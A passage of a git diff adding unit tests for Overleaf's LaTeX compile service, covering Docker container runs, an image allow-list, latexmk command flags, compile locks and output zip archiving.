'/var/lib/overleaf/data/compile/xyz' + this.DockerRunner._runAndWaitForContainer = sinon + .stub() + .callsArgWith(3, null, (this.output = 'mock-output')) + this.DockerRunner.run( + this.project_id, + this.command, + this.directory, + this.image, + this.timeout, + this.env, + 'wordcount', + this.callback + ) + }) + + it('should re-write the bind directory', function () { + const volumes = + this.DockerRunner._runAndWaitForContainer.lastCall.args[1] + expect(volumes).to.deep.equal({ + '/some/host/dir/compiles/xyz': '/compile:ro', + }) + }) + + it('should call the callback', function () { + this.callback.calledWith(null, this.output).should.equal(true) + }) + }) + + describe('when the run throws an error', function () { + beforeEach(function () { + let firstTime = true + this.output = 'mock-output' + this.DockerRunner._runAndWaitForContainer = ( + options, + volumes, + timeout, + callback + ) => { + if (callback == null) { + callback = function () {} + } + if (firstTime) { + firstTime = false + const error = new Error('(HTTP code 500) server error - ...') + error.statusCode = 500 + return callback(error) + } else { + return callback(null, this.output) + } + } + sinon.spy(this.DockerRunner, '_runAndWaitForContainer') + this.DockerRunner.destroyContainer = sinon.stub().callsArg(3) + return this.DockerRunner.run( + this.project_id, + this.command, + this.directory, + this.image, + this.timeout, + this.env, + this.compileGroup, + this.callback + ) + }) + + it('should do the run twice', function () { + return this.DockerRunner._runAndWaitForContainer.calledTwice.should.equal( + true + ) + }) + + it('should destroy the container in between', function () { + return this.DockerRunner.destroyContainer + .calledWith(this.name, null) + .should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.calledWith(null, this.output).should.equal(true) + }) + }) + + describe('with no image', function () { + beforeEach(function () { + this.DockerRunner._runAndWaitForContainer = sinon + .stub() + .callsArgWith(3, null, (this.output = 'mock-output')) + return this.DockerRunner.run( + this.project_id, + this.command, + this.directory, + null, + this.timeout, + this.env, + this.compileGroup, + this.callback + ) + }) + + return it('should use the default image', function () { + return this.DockerRunner._getContainerOptions + .calledWith( + this.command_with_dir, + this.defaultImage, + this.volumes, + this.timeout + ) + .should.equal(true) + }) + }) + + describe('with image override', function () { + beforeEach(function () { + this.Settings.texliveImageNameOveride = 'overrideimage.com/something' + this.DockerRunner._runAndWaitForContainer = sinon + .stub() + .callsArgWith(3, null, (this.output = 'mock-output')) + return this.DockerRunner.run( + this.project_id, + this.command, + this.directory, + this.image, + this.timeout, + this.env, + this.compileGroup, + this.callback + ) + }) + + return it('should use the override and keep the tag', function () { + const image = this.DockerRunner._getContainerOptions.args[0][1] + return image.should.equal('overrideimage.com/something/image:2016.2') + }) + }) + + describe('with image restriction', function () { + beforeEach(function () { + this.Settings.clsi.docker.allowedImages = [ + 'repo/image:tag1', + 'repo/image:tag2', + ] + this.DockerRunner._runAndWaitForContainer = sinon + .stub() + .callsArgWith(3, null, (this.output = 'mock-output')) + }) + + describe('with a valid image', function () { + beforeEach(function () { + this.DockerRunner.run( + this.project_id, + this.command, + this.directory, + 'repo/image:tag1', + this.timeout, + this.env, + this.compileGroup, + this.callback + ) + }) + + it('should setup the container', function () { + this.DockerRunner._getContainerOptions.called.should.equal(true) + }) + }) + + describe('with a invalid image', function () { + beforeEach(function () { + this.DockerRunner.run( + this.project_id, + this.command, + this.directory, + 'something/different:evil', + this.timeout, + this.env, + this.compileGroup, + this.callback + ) + }) + + it('should call the callback with an error', function () { + const err = new Error('image not allowed') + this.callback.called.should.equal(true) + this.callback.args[0][0].message.should.equal(err.message) + }) + + it('should not setup the container', function () { + this.DockerRunner._getContainerOptions.called.should.equal(false) + }) + }) + }) + }) + + describe('run with _getOptions', function () { + beforeEach(function (done) { + // this.DockerRunner._getContainerOptions = sinon + // .stub() + // .returns((this.options = { mockoptions: 'foo' })) + this.DockerRunner._fingerprintContainer = sinon + .stub() + .returns((this.fingerprint = 'fingerprint')) + + this.name = `project-${this.project_id}-${this.fingerprint}` + + this.command = ['mock', 'command', '--outdir=$COMPILE_DIR'] + this.command_with_dir = ['mock', 'command', '--outdir=/compile'] + this.timeout = 42000 + return done() + }) + + describe('when a compile group config is set', function () { + beforeEach(function () { + this.Settings.clsi.docker.compileGroupConfig = { + 'compile-group': { + 'HostConfig.newProperty': 'new-property', + }, + 'other-group': { otherProperty: 'other-property' }, + } + this.DockerRunner._runAndWaitForContainer = sinon + .stub() + .callsArgWith(3, null, (this.output = 'mock-output')) + return this.DockerRunner.run( + this.project_id, + this.command, + this.directory, + this.image, + this.timeout, + this.env, + this.compileGroup, + this.callback + ) + }) + + it('should set the docker options for the compile group', function () { + const options = + this.DockerRunner._runAndWaitForContainer.lastCall.args[0] + return expect(options.HostConfig).to.deep.include({ + Binds: ['/some/host/dir/compiles/directory:/compile:rw'], + LogConfig: { Type: 'none', Config: {} }, + CapDrop: 'ALL', + SecurityOpt: ['no-new-privileges'], + newProperty: 'new-property', + }) + }) + + return it('should call the callback', function () { + return this.callback.calledWith(null, this.output).should.equal(true) + }) + }) + }) + + describe('_runAndWaitForContainer', function () { + beforeEach(function () { + this.options = { mockoptions: 'foo', name: (this.name = 'mock-name') } + this.DockerRunner.startContainer = ( + options, + volumes, + attachStreamHandler, + callback + ) => { + attachStreamHandler(null, (this.output = 'mock-output')) + return callback(null, (this.containerId = 'container-id')) + } + sinon.spy(this.DockerRunner, 'startContainer') + this.DockerRunner.waitForContainer = sinon + .stub() + .callsArgWith(2, null, (this.exitCode = 42)) + return this.DockerRunner._runAndWaitForContainer( + this.options, + this.volumes, + this.timeout, + this.callback + ) + }) + + it('should create/start the container', function () { + return this.DockerRunner.startContainer + .calledWith(this.options, this.volumes) + .should.equal(true) + }) + + it('should wait for the container to finish', function () { + return this.DockerRunner.waitForContainer + .calledWith(this.name, this.timeout) + .should.equal(true) + }) + + return it('should call the callback with the output', function () { + return this.callback.calledWith(null, this.output).should.equal(true) + }) + }) + + describe('startContainer', function () { + beforeEach(function () { + this.attachStreamHandler = sinon.stub() + this.attachStreamHandler.cock = true + this.options = { mockoptions: 'foo', name: 'mock-name' } + this.container.inspect = sinon.stub().callsArgWith(0) + this.DockerRunner.attachToContainer = ( + containerId, + attachStreamHandler, + cb + ) => { + attachStreamHandler() + return cb() + } + return sinon.spy(this.DockerRunner, 'attachToContainer') + }) + + describe('when the container exists', function () { + beforeEach(function () { + this.container.inspect = sinon.stub().callsArgWith(0) + this.container.start = sinon.stub().yields() + + return this.DockerRunner.startContainer( + this.options, + this.volumes, + () => {}, + this.callback + ) + }) + + it('should start the container with the given name', function () { + this.getContainer.calledWith(this.options.name).should.equal(true) + return this.container.start.called.should.equal(true) + }) + + it('should not try to create the container', function () { + return this.createContainer.called.should.equal(false) + }) + + it('should attach to the container', function () { + return this.DockerRunner.attachToContainer.called.should.equal(true) + }) + + it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + + return it('should attach before the container starts', function () { + return sinon.assert.callOrder( + this.DockerRunner.attachToContainer, + this.container.start + ) + }) + }) + + describe('when the container does not exist', function () { + beforeEach(function () { + const exists = false + this.container.start = sinon.stub().yields() + this.container.inspect = sinon + .stub() + .callsArgWith(0, { statusCode: 404 }) + return this.DockerRunner.startContainer( + this.options, + this.volumes, + this.attachStreamHandler, + this.callback + ) + }) + + it('should create the container', function () { + return this.createContainer.calledWith(this.options).should.equal(true) + }) + + it('should call the callback and stream handler', function () { + this.attachStreamHandler.called.should.equal(true) + return this.callback.called.should.equal(true) + }) + + it('should attach to the container', function () { + return this.DockerRunner.attachToContainer.called.should.equal(true) + }) + + return it('should attach before the container starts', function () { + return sinon.assert.callOrder( + this.DockerRunner.attachToContainer, + this.container.start + ) + }) + }) + + describe('when the container is already running', function () { + beforeEach(function () { + const error = new Error( + `HTTP code is 304 which indicates error: server error - start: Cannot start container ${this.name}: The container MOCKID is already running.` + ) + error.statusCode = 304 + this.container.start = sinon.stub().yields(error) + this.container.inspect = sinon.stub().callsArgWith(0) + return this.DockerRunner.startContainer( + this.options, + this.volumes, + this.attachStreamHandler, + this.callback + ) + }) + + it('should not try to create the container', function () { + return this.createContainer.called.should.equal(false) + }) + + return it('should call the callback and stream handler without an error', function () { + this.attachStreamHandler.called.should.equal(true) + return this.callback.called.should.equal(true) + }) + }) + + return describe('when the container tries to be created, but already has been (race condition)', function () {}) + }) + + describe('waitForContainer', function () { + beforeEach(function () { + this.containerId = 'container-id' + this.timeout = 5000 + this.container.wait = sinon + .stub() + .yields(null, { StatusCode: (this.statusCode = 42) }) + return (this.container.kill = sinon.stub().yields()) + }) + + describe('when the container returns in time', function () { + beforeEach(function () { + return this.DockerRunner.waitForContainer( + this.containerId, + this.timeout, + this.callback + ) + }) + + it('should wait for the container', function () { + this.getContainer.calledWith(this.containerId).should.equal(true) + return this.container.wait.called.should.equal(true) + }) + + return it('should call the callback with the exit', function () { + return this.callback + .calledWith(null, this.statusCode) + .should.equal(true) + }) + }) + + return describe('when the container does not return before the timeout', function () { + beforeEach(function (done) { + this.container.wait = function (callback) { + if (callback == null) { + callback = function () {} + } + return setTimeout(() => callback(null, { StatusCode: 42 }), 100) + } + this.timeout = 5 + return this.DockerRunner.waitForContainer( + this.containerId, + this.timeout, + (...args) => { + this.callback(...Array.from(args || [])) + return done() + } + ) + }) + + it('should call kill on the container', function () { + this.getContainer.calledWith(this.containerId).should.equal(true) + return this.container.kill.called.should.equal(true) + }) + + it('should call the callback with an error', function () { + this.callback.calledWith(sinon.match(Error)).should.equal(true) + + const errorObj = this.callback.args[0][0] + expect(errorObj.message).to.include('container timed out') + expect(errorObj.timedout).equal(true) + }) + }) + }) + + describe('destroyOldContainers', function () { + beforeEach(function (done) { + const oneHourInSeconds = 60 * 60 + const oneHourInMilliseconds = oneHourInSeconds * 1000 + const nowInSeconds = Date.now() / 1000 + this.containers = [ + { + Name: '/project-old-container-name', + Id: 'old-container-id', + Created: nowInSeconds - oneHourInSeconds - 100, + }, + { + Name: '/project-new-container-name', + Id: 'new-container-id', + Created: nowInSeconds - oneHourInSeconds + 100, + }, + { + Name: '/totally-not-a-project-container', + Id: 'some-random-id', + Created: nowInSeconds - 2 * oneHourInSeconds, + }, + ] + this.DockerRunner.MAX_CONTAINER_AGE = oneHourInMilliseconds + this.listContainers.callsArgWith(1, null, this.containers) + this.DockerRunner.destroyContainer = sinon.stub().callsArg(3) + return this.DockerRunner.destroyOldContainers(error => { + this.callback(error) + return done() + }) + }) + + it('should list all containers', function () { + return this.listContainers.calledWith({ all: true }).should.equal(true) + }) + + it('should destroy old containers', function () { + this.DockerRunner.destroyContainer.callCount.should.equal(1) + return this.DockerRunner.destroyContainer + .calledWith('project-old-container-name', 'old-container-id') + .should.equal(true) + }) + + it('should not destroy new containers', function () { + return this.DockerRunner.destroyContainer + .calledWith('project-new-container-name', 'new-container-id') + .should.equal(false) + }) + + it('should not destroy non-project containers', function () { + return this.DockerRunner.destroyContainer + .calledWith('totally-not-a-project-container', 'some-random-id') + .should.equal(false) + }) + + return it('should callback the callback', function () { + return this.callback.called.should.equal(true) + }) + }) + + describe('_destroyContainer', function () { + beforeEach(function () { + this.containerId = 'some_id' + this.fakeContainer = { remove: sinon.stub().callsArgWith(1, null) } + return (this.Docker.prototype.getContainer = sinon + .stub() + .returns(this.fakeContainer)) + }) + + it('should get the container', function (done) { + return this.DockerRunner._destroyContainer( + this.containerId, + false, + err => { + if (err) return done(err) + this.Docker.prototype.getContainer.callCount.should.equal(1) + this.Docker.prototype.getContainer + .calledWith(this.containerId) + .should.equal(true) + return done() + } + ) + }) + + it('should try to force-destroy the container when shouldForce=true', function (done) { + return this.DockerRunner._destroyContainer( + this.containerId, + true, + err => { + if (err) return done(err) + this.fakeContainer.remove.callCount.should.equal(1) + this.fakeContainer.remove + .calledWith({ force: true, v: true }) + .should.equal(true) + return done() + } + ) + }) + + it('should not try to force-destroy the container when shouldForce=false', function (done) { + return this.DockerRunner._destroyContainer( + this.containerId, + false, + err => { + if (err) return done(err) + this.fakeContainer.remove.callCount.should.equal(1) + this.fakeContainer.remove + .calledWith({ force: false, v: true }) + .should.equal(true) + return done() + } + ) + }) + + it('should not produce an error', function (done) { + return this.DockerRunner._destroyContainer( + this.containerId, + false, + err => { + expect(err).to.equal(null) + return done() + } + ) + }) + + describe('when the container is already gone', function () { + beforeEach(function () { + this.fakeError = new Error('woops') + this.fakeError.statusCode = 404 + this.fakeContainer = { + remove: sinon.stub().callsArgWith(1, this.fakeError), + } + return (this.Docker.prototype.getContainer = sinon + .stub() + .returns(this.fakeContainer)) + }) + + return it('should not produce an error', function (done) { + return this.DockerRunner._destroyContainer( + this.containerId, + false, + err => { + expect(err).to.equal(null) + return done() + } + ) + }) + }) + + return describe('when container.destroy produces an error', function (done) { + beforeEach(function () { + this.fakeError = new Error('woops') + this.fakeError.statusCode = 500 + this.fakeContainer = { + remove: sinon.stub().callsArgWith(1, this.fakeError), + } + return (this.Docker.prototype.getContainer = sinon + .stub() + .returns(this.fakeContainer)) + }) + + return it('should produce an error', function (done) { + return this.DockerRunner._destroyContainer( + this.containerId, + false, + err => { + expect(err).to.not.equal(null) + expect(err).to.equal(this.fakeError) + return done() + } + ) + }) + }) + }) + + return describe('kill', function () { + beforeEach(function () { + this.containerId = 'some_id' + this.fakeContainer = { kill: sinon.stub().callsArgWith(0, null) } + return (this.Docker.prototype.getContainer = sinon + .stub() + .returns(this.fakeContainer)) + }) + + it('should get the container', function (done) { + return this.DockerRunner.kill(this.containerId, err => { + if (err) return done(err) + this.Docker.prototype.getContainer.callCount.should.equal(1) + this.Docker.prototype.getContainer + .calledWith(this.containerId) + .should.equal(true) + return done() + }) + }) + + it('should try to force-destroy the container', function (done) { + return this.DockerRunner.kill(this.containerId, err => { + if (err) return done(err) + this.fakeContainer.kill.callCount.should.equal(1) + return done() + }) + }) + + it('should not produce an error', function (done) { + return this.DockerRunner.kill(this.containerId, err => { + expect(err).to.equal(undefined) + return done() + }) + }) + + describe('when the container is not actually running', function () { + beforeEach(function () { + this.fakeError = new Error('woops') + this.fakeError.statusCode = 500 + this.fakeError.message = + 'Cannot kill container <whatever> is not running' + this.fakeContainer = { + kill: sinon.stub().callsArgWith(0, this.fakeError), + } + return (this.Docker.prototype.getContainer = sinon + .stub() + .returns(this.fakeContainer)) + }) + + return it('should not produce an error', function (done) { + return this.DockerRunner.kill(this.containerId, err => { + expect(err).to.equal(undefined) + return done() + }) + }) + }) + + return describe('when container.kill produces a legitimate error', function (done) { + beforeEach(function () { + this.fakeError = new Error('woops') + this.fakeError.statusCode = 500 + this.fakeError.message = 'Totally legitimate reason to throw an error' + this.fakeContainer = { + kill: sinon.stub().callsArgWith(0, this.fakeError), + } + return (this.Docker.prototype.getContainer = sinon + .stub() + .returns(this.fakeContainer)) + }) + + return it('should produce an error', function (done) { + return this.DockerRunner.kill(this.containerId, err => { + expect(err).to.not.equal(undefined) + expect(err).to.equal(this.fakeError) + return done() + }) + }) + }) + }) +}) diff --git a/services/clsi/test/unit/js/DraftModeManagerTests.js b/services/clsi/test/unit/js/DraftModeManagerTests.js new file mode 100644 index 0000000..eda8338 --- /dev/null +++ b/services/clsi/test/unit/js/DraftModeManagerTests.js @@ -0,0 +1,44 @@ +const Path = require('node:path') +const fsPromises = require('node:fs/promises') +const { expect } = require('chai') +const mockFs = require('mock-fs') +const SandboxedModule = require('sandboxed-module') + +const MODULE_PATH = Path.join(__dirname, '../../../app/js/DraftModeManager') + +describe('DraftModeManager', function () { + beforeEach(function () { + this.DraftModeManager = SandboxedModule.require(MODULE_PATH, { + requires: { + 'fs/promises': fsPromises, + }, + }) + this.filename = '/mock/filename.tex' + this.contents = `\ +\\documentclass{article} +\\begin{document} +Hello world +\\end{document}\ +` + mockFs({ + [this.filename]: this.contents, + }) + }) + + afterEach(function () { + mockFs.restore() + }) + + describe('injectDraftMode', function () { + it('prepends a special command to the beginning of the file', async function () { + await this.DraftModeManager.promises.injectDraftMode(this.filename) + const contents = await fsPromises.readFile(this.filename, { + encoding: 'utf8', + }) + expect(contents).to.equal( + '\\PassOptionsToPackage{draft}{graphicx}\\PassOptionsToPackage{draft}{graphics}' + + this.contents + ) + }) + }) +}) diff --git a/services/clsi/test/unit/js/LatexRunnerTests.js b/services/clsi/test/unit/js/LatexRunnerTests.js new file mode 100644 index 0000000..0d250dd --- /dev/null +++ b/services/clsi/test/unit/js/LatexRunnerTests.js @@ -0,0 +1,219 @@ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const { expect } = require('chai') + +const MODULE_PATH = require('node:path').join( + __dirname, + '../../../app/js/LatexRunner' +) + +describe('LatexRunner', function () { + beforeEach(function () { + this.Settings = { + docker: { + socketPath: '/var/run/docker.sock', + }, + } + this.commandRunnerOutput = { + stdout: 'this is stdout', + stderr: 'this is stderr', + } + this.CommandRunner = { + run: sinon.stub().yields(null, this.commandRunnerOutput), + } + this.fs = { + writeFile: sinon.stub().yields(), + unlink: sinon + .stub() + .yields(new Error('ENOENT: no such file or directory, unlink ...')), + } + this.LatexRunner = SandboxedModule.require(MODULE_PATH, { + requires: { + '@overleaf/settings': this.Settings, + './CommandRunner': this.CommandRunner, + fs: this.fs, + }, + }) + + this.directory = '/local/compile/directory' + this.mainFile = 'main-file.tex' + this.compiler = 'pdflatex' + this.image = 'example.com/image' + this.compileGroup = 'compile-group' + this.callback = sinon.stub() + this.project_id = 'project-id-123' + this.env = { foo: '123' } + this.timeout = 42000 + this.flags = [] + this.stopOnFirstError = false + this.stats = {} + this.timings = {} + + this.call = function (callback) { + this.LatexRunner.runLatex( + this.project_id, + { + directory: this.directory, + mainFile: this.mainFile, + compiler: this.compiler, + timeout: this.timeout, + image: this.image, + environment: this.env, + compileGroup: this.compileGroup, + flags: this.flags, + stopOnFirstError: this.stopOnFirstError, + timings: this.timings, + stats: this.stats, + }, + callback + ) + } + }) + + describe('runLatex', function () { + describe('normally', function () { + beforeEach(function (done) { + this.call(done) + }) + + it('should run the latex command', function () { + this.CommandRunner.run.should.have.been.calledWith( + this.project_id, + [ + 'latexmk', + '-cd', + '-jobname=output', + '-auxdir=$COMPILE_DIR', + '-outdir=$COMPILE_DIR', + '-synctex=1', + '-interaction=batchmode', + '-f', + '-pdf', + '$COMPILE_DIR/main-file.tex', + ], + this.directory, + this.image, + this.timeout, + this.env, + this.compileGroup + ) + }) + + it('should record the stdout and stderr', function () { + this.fs.writeFile.should.have.been.calledWith( + this.directory + '/' + 'output.stdout', + 'this is stdout', + { flag: 'wx' } + ) + this.fs.writeFile.should.have.been.calledWith( + this.directory + '/' + 'output.stderr', + 'this is stderr', + { flag: 'wx' } + ) + this.fs.unlink.should.have.been.calledWith( + this.directory + '/' + 'output.stdout' + ) + this.fs.unlink.should.have.been.calledWith( + this.directory + '/' + 'output.stderr' + ) + }) + + it('should not record cpu metrics', function () { + expect(this.timings['cpu-percent']).to.not.exist + expect(this.timings['cpu-time']).to.not.exist + expect(this.timings['sys-time']).to.not.exist + }) + }) + + describe('with a different compiler', function () { + beforeEach(function (done) { + this.compiler = 'lualatex' + this.call(done) + }) + + it('should set the appropriate latexmk flag', function () { + this.CommandRunner.run.should.have.been.calledWith(this.project_id, [ + 'latexmk', + '-cd', + '-jobname=output', + '-auxdir=$COMPILE_DIR', + '-outdir=$COMPILE_DIR', + '-synctex=1', + '-interaction=batchmode', + '-f', + '-lualatex', + '$COMPILE_DIR/main-file.tex', + ]) + }) + }) + + describe('with time -v', function () { + beforeEach(function (done) { + this.commandRunnerOutput.stderr = + '\tCommand being timed: "sh -c timeout 1 yes > /dev/null"\n' + + '\tUser time (seconds): 0.28\n' + + '\tSystem time (seconds): 0.70\n' + + '\tPercent of CPU this job got: 98%\n' + this.call(done) + }) + + it('should record cpu metrics', function () { + expect(this.timings['cpu-percent']).to.equal(98) + expect(this.timings['cpu-time']).to.equal(0.28) + expect(this.timings['sys-time']).to.equal(0.7) + }) + }) + + describe('with an .Rtex main file', function () { + beforeEach(function (done) { + this.mainFile = 'main-file.Rtex' + this.call(done) + }) + + it('should run the latex command on the equivalent .tex file', function () { + const command = this.CommandRunner.run.args[0][1] + const mainFile = command.slice(-1)[0] + mainFile.should.equal('$COMPILE_DIR/main-file.tex') + }) + }) + + describe('with a flags option', function () { + beforeEach(function (done) { + this.flags = ['-shell-restricted', '-halt-on-error'] + this.call(done) + }) + + it('should include the flags in the command', function () { + const command = this.CommandRunner.run.args[0][1] + const flags = command.filter( + arg => arg === '-shell-restricted' || arg === '-halt-on-error' + ) + flags.length.should.equal(2) + flags[0].should.equal('-shell-restricted') + flags[1].should.equal('-halt-on-error') + }) + }) + + describe('with the stopOnFirstError option', function () { + beforeEach(function (done) { + this.stopOnFirstError = true + this.call(done) + }) + + it('should set the appropriate flags', function () { + this.CommandRunner.run.should.have.been.calledWith(this.project_id, [ + 'latexmk', + '-cd', + '-jobname=output', + '-auxdir=$COMPILE_DIR', + '-outdir=$COMPILE_DIR', + '-synctex=1', + '-interaction=batchmode', + '-halt-on-error', + '-pdf', + '$COMPILE_DIR/main-file.tex', + ]) + }) + }) + }) +}) diff --git a/services/clsi/test/unit/js/LockManagerTests.js b/services/clsi/test/unit/js/LockManagerTests.js new file mode 100644 index 0000000..7005b3e --- /dev/null +++ b/services/clsi/test/unit/js/LockManagerTests.js @@ -0,0 +1,116 @@ +const { expect } = require('chai') +const sinon = require('sinon') +const SandboxedModule = require('sandboxed-module') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/LockManager' +) +const Errors = require('../../../app/js/Errors') + +describe('LockManager', function () { + beforeEach(function () { + this.key = '/local/compile/directory' + this.clock = sinon.useFakeTimers() + this.LockManager = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/metrics': (this.Metrics = { + inc: sinon.stub(), + gauge: sinon.stub(), + }), + '@overleaf/settings': (this.Settings = { + compileConcurrencyLimit: 5, + }), + './Errors': (this.Erros = Errors), + './RequestParser': { MAX_TIMEOUT: 600 }, + }, + }) + }) + + afterEach(function () { + this.clock.restore() + }) + + describe('when the lock is available', function () { + it('the lock can be acquired', function () { + const lock = this.LockManager.acquire(this.key) + expect(lock).to.exist + lock.release() + }) + }) + + describe('after the lock is acquired', function () { + beforeEach(function () { + this.lock = this.LockManager.acquire(this.key) + }) + + afterEach(function () { + if (this.lock != null) { + this.lock.release() + } + }) + + it("the lock can't be acquired again", function () { + expect(() => this.LockManager.acquire(this.key)).to.throw( + Errors.AlreadyCompilingError + ) + }) + + it('another lock can be acquired', function () { + const lock = this.LockManager.acquire('another key') + expect(lock).to.exist + lock.release() + }) + + it('the lock can be acquired again after an expiry period', function () { + // The expiry time is a little bit over 10 minutes. Let's wait 15 minutes. + this.clock.tick(15 * 60 * 1000) + this.lock = this.LockManager.acquire(this.key) + expect(this.lock).to.exist + }) + + it('the lock can be acquired again after it was released', function () { + this.lock.release() + this.lock = this.LockManager.acquire(this.key) + expect(this.lock).to.exist + }) + }) + + describe('concurrency limit', function () { + it('exceeding the limit', function () { + for (let i = 0; i <= this.Settings.compileConcurrencyLimit; i++) { + this.LockManager.acquire('test_key' + i) + } + this.Metrics.inc + .calledWith('exceeded-compilier-concurrency-limit') + .should.equal(false) + expect(() => + this.LockManager.acquire( + 'test_key_' + (this.Settings.compileConcurrencyLimit + 1), + false + ) + ).to.throw(Errors.TooManyCompileRequestsError) + + this.Metrics.inc + .calledWith('exceeded-compilier-concurrency-limit') + .should.equal(true) + }) + + it('within the limit', function () { + for (let i = 0; i <= this.Settings.compileConcurrencyLimit - 1; i++) { + this.LockManager.acquire('test_key' + i) + } + this.Metrics.inc + .calledWith('exceeded-compilier-concurrency-limit') + .should.equal(false) + + const lock = this.LockManager.acquire( + 'test_key_' + this.Settings.compileConcurrencyLimit, + false + ) + + expect(lock.key).to.equal( + 'test_key_' + this.Settings.compileConcurrencyLimit + ) + }) + }) +}) diff --git a/services/clsi/test/unit/js/OutputControllerTests.js b/services/clsi/test/unit/js/OutputControllerTests.js new file mode 100644 index 0000000..ee5c9c2 --- /dev/null +++ b/services/clsi/test/unit/js/OutputControllerTests.js @@ -0,0 +1,105 @@ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const MODULE_PATH = require('node:path').join( + __dirname, + '../../../app/js/OutputController' +) + +describe('OutputController', function () { + describe('createOutputZip', function () { + beforeEach(function () { + this.archive = {} + + this.pipeline = sinon.stub().resolves() + + this.archiveFilesForBuild = sinon.stub().resolves(this.archive) + + this.OutputController = SandboxedModule.require(MODULE_PATH, { + requires: { + './OutputFileArchiveManager': { + archiveFilesForBuild: this.archiveFilesForBuild, + }, + 'stream/promises': { + pipeline: this.pipeline, + }, + }, + }) + }) + + describe('when OutputFileArchiveManager creates an archive', function () { + beforeEach(function (done) { + this.res = { + attachment: sinon.stub(), + setHeader: sinon.stub(), + } + this.req = { + params: { + project_id: 'project-id-123', + user_id: 'user-id-123', + build_id: 'build-id-123', + }, + query: { + files: ['output.tex'], + }, + } + this.pipeline.callsFake(() => { + done() + return Promise.resolve() + }) + this.OutputController.createOutputZip(this.req, this.res) + }) + + it('creates a pipeline from the archive to the response', function () { + sinon.assert.calledWith(this.pipeline, this.archive, this.res) + }) + + it('calls the express convenience method to set attachment headers', function () { + sinon.assert.calledWith(this.res.attachment, 'output.zip') + }) + + it('sets the X-Content-Type-Options header to nosniff', function () { + sinon.assert.calledWith( + this.res.setHeader, + 'X-Content-Type-Options', + 'nosniff' + ) + }) + }) + + describe('when OutputFileArchiveManager throws an error', function () { + let error + + beforeEach(function (done) { + error = new Error('error message') + + this.archiveFilesForBuild.rejects(error) + + this.res = { + status: sinon.stub().returnsThis(), + send: sinon.stub(), + } + this.req = { + params: { + project_id: 'project-id-123', + user_id: 'user-id-123', + build_id: 'build-id-123', + }, + query: { + files: ['output.tex'], + }, + } + this.OutputController.createOutputZip( + this.req, + this.res, + (this.next = sinon.stub().callsFake(() => { + done() + })) + ) + }) + + it('calls next with the error', function () { + sinon.assert.calledWith(this.next, error) + }) + }) + }) +}) diff --git a/services/clsi/test/unit/js/OutputFileArchiveManagerTests.js b/services/clsi/test/unit/js/OutputFileArchiveManagerTests.js new file mode 100644 index 0000000..d6817f3 --- /dev/null +++ b/services/clsi/test/unit/js/OutputFileArchiveManagerTests.js @@ -0,0 +1,229 @@ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const { assert, expect } = require('chai') + +const MODULE_PATH = require('node:path').join( + __dirname, + '../../../app/js/OutputFileArchiveManager' +) + +describe('OutputFileArchiveManager', function () { + const userId = 'user-id-123' + const projectId = 'project-id-123' + const buildId = 'build-id-123' + + afterEach(function () { + sinon.restore() + }) + + beforeEach(function () { + this.OutputFileFinder = { + promises: { + findOutputFiles: sinon.stub().resolves({ outputFiles: [] }), + }, + } + + this.OutputCacheManger = { + path: sinon.stub().callsFake((build, path) => { + return `${build}/${path}` + }), + } + + this.archive = { + append: sinon.stub(), + finalize: sinon.stub().resolves(), + on: sinon.stub(), + } + + this.archiver = sinon.stub().returns(this.archive) + + this.outputDir = '/output/dir' + + this.fs = { + open: sinon.stub().callsFake(file => ({ + createReadStream: sinon.stub().returns(`handle: ${file}`), + })), + } + + this.OutputFileArchiveManager = SandboxedModule.require(MODULE_PATH, { + requires: { + './OutputFileFinder': this.OutputFileFinder, + './OutputCacheManager': this.OutputCacheManger, + archiver: this.archiver, + 'fs/promises': this.fs, + '@overleaf/settings': { + path: { + outputDir: this.outputDir, + }, + }, + }, + }) + }) + + describe('when the output cache directory contains only exportable files', function () { + beforeEach(async function () { + this.OutputFileFinder.promises.findOutputFiles.resolves({ + outputFiles: [ + { path: 'file_1' }, + { path: 'file_2' }, + { path: 'file_3' }, + { path: 'file_4' }, + ], + }) + await this.OutputFileArchiveManager.archiveFilesForBuild( + projectId, + userId, + buildId + ) + }) + + it('creates a zip archive', function () { + sinon.assert.calledWith(this.archiver, 'zip') + }) + + it('listens to errors from the archive', function () { + sinon.assert.calledWith(this.archive.on, 'error', sinon.match.func) + }) + + it('adds all the output files to the archive', function () { + expect(this.archive.append.callCount).to.equal(4) + sinon.assert.calledWith( + this.archive.append, + `handle: ${this.outputDir}/${projectId}-${userId}/${buildId}/file_1`, + sinon.match({ name: 'file_1' }) + ) + sinon.assert.calledWith( + this.archive.append, + `handle: ${this.outputDir}/${projectId}-${userId}/${buildId}/file_2`, + sinon.match({ name: 'file_2' }) + ) + sinon.assert.calledWith( + this.archive.append, + `handle: ${this.outputDir}/${projectId}-${userId}/${buildId}/file_3`, + sinon.match({ name: 'file_3' }) + ) + sinon.assert.calledWith( + this.archive.append, + `handle: ${this.outputDir}/${projectId}-${userId}/${buildId}/file_4`, + sinon.match({ name: 'file_4' }) + ) + }) + + it('finalizes the archive after all files are appended', function () { + sinon.assert.called(this.archive.finalize) + expect(this.archive.finalize.calledBefore(this.archive.append)).to.be + .false + }) + }) + + describe('when the directory includes files ignored by web', function () { + beforeEach(async function () { + this.OutputFileFinder.promises.findOutputFiles.resolves({ + outputFiles: [ + { path: 'file_1' }, + { path: 'file_2' }, + { path: 'file_3' }, + { path: 'file_4' }, + { path: 'output.pdf' }, + ], + }) + await this.OutputFileArchiveManager.archiveFilesForBuild( + projectId, + userId, + buildId + ) + }) + + it('only includes the non-ignored files in the archive', function () { + expect(this.archive.append.callCount).to.equal(4) + sinon.assert.calledWith( + this.archive.append, + `handle: ${this.outputDir}/${projectId}-${userId}/${buildId}/file_1`, + sinon.match({ name: 'file_1' }) + ) + sinon.assert.calledWith( + this.archive.append, + `handle: ${this.outputDir}/${projectId}-${userId}/${buildId}/file_2`, + sinon.match({ name: 'file_2' }) + ) + sinon.assert.calledWith( + this.archive.append, + `handle: ${this.outputDir}/${projectId}-${userId}/${buildId}/file_3`, + sinon.match({ name: 'file_3' }) + ) + sinon.assert.calledWith( + this.archive.append, + `handle: ${this.outputDir}/${projectId}-${userId}/${buildId}/file_4`, + sinon.match({ name: 'file_4' }) + ) + }) + }) 